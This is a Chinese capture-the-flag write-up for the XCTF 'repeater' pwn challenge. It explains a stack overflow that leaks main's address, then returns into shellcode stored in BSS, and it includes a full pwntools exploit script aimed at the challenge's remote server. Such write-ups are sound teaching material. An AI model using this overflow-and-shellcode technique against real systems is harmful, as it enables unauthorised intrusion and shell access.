攻防世界 repeater 题解
查看程序保护情况,开启了PIE,没开NX,RELRO全开。
在ida64中打开分析程序,这道题程序比较简单。可以发现的信息如下:
- 字符数组s大小为0x20,但可以读入0x40的长度,起始于rbp-30h处(见红框)
- 变量v5可以控制循环、条件控制输出main函数地址,该变量位于rbp-20h字符数组s空间后(见粉框)
- 通过字符串s溢出可控制变量v5的值及函数返回地址
- 程序运行起始可输入数据到内存BSS段(见蓝框)
根据这些信息,这道题的思路就出来了:
- 程序起始运行,提示输入name时,输入一段shellcode(将存储到byte_202040处)
- 通过字符串s溢出控制变量v5的值为3281697,从而泄露出main函数地址
- 通过main函数地址及byte_202040与main地址偏移,获得shellcode代码地址
- 构造溢出输入,覆盖返回地址,使程序跳转到shellcode执行,获得系统shell
这道题还是非常简单的,只是我在做的时候shellcode没选对,导致一直没利用成功(忘记改arch值)。
下面是这道题的完整代码:- from pwn import *
- sh = remote('61.147.171.105',50187)
- # 通过输入name向BSS段写入shellcode
- context.arch = 'amd64'
- shellcode = asm(shellcraft.sh())
- sh.sendlineafter('name :',shellcode)
- # 通过输入内容溢出修改控制变量值,泄露main地址
- num = 3281697
- payload = b'A'*0x20 + p64(num)
- sh.sendlineafter('input :',payload)
- sh.recvuntil('you :\n0x')
- main_addr = int(sh.recv(12),16)
- # 再次通过输入内容溢出,将函数返回地址改为shellcode地址
- shellcode_addr = main_addr + 0x202040 - 0xa33
- payload2 = b'A'*0x20 + p64(0x1) + b'B'*16 + p64(shellcode_addr)
- sh.sendlineafter('input :',payload2)
- sh.interactive()
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
